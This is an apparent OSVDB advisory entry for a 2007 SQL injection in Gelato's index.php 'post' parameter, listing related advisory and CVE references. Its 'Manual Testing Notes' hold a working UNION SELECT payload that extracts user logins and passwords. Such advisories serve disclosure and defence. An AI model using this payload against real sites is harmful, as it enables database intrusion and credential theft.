Gelato index.php post Variable SQL Injection

2007-09-14T00:00:00
ID: OSVDB:37087
Type: osvdb
Reporter: OSVDB
Modified: 2007-09-14T00:00:00

Description

Manual Testing Notes

"/index.php?post=-1//union//select//1,concat(0x7330633a3a,login,0x3a3a,password,0x3a3a),null,null,null,null,null//from/*/".$prefix."users/

References:

Secunia Advisory ID: 26785
Other Advisory URL: http://milw0rm.com/exploits/4410
Other Advisory URL: http://securityreason.com/securityalert/3148
ISS X-Force ID: 36617
FrSIRT Advisory: ADV-2007-3179
CVE-2007-4918
Bugtraq ID: 25677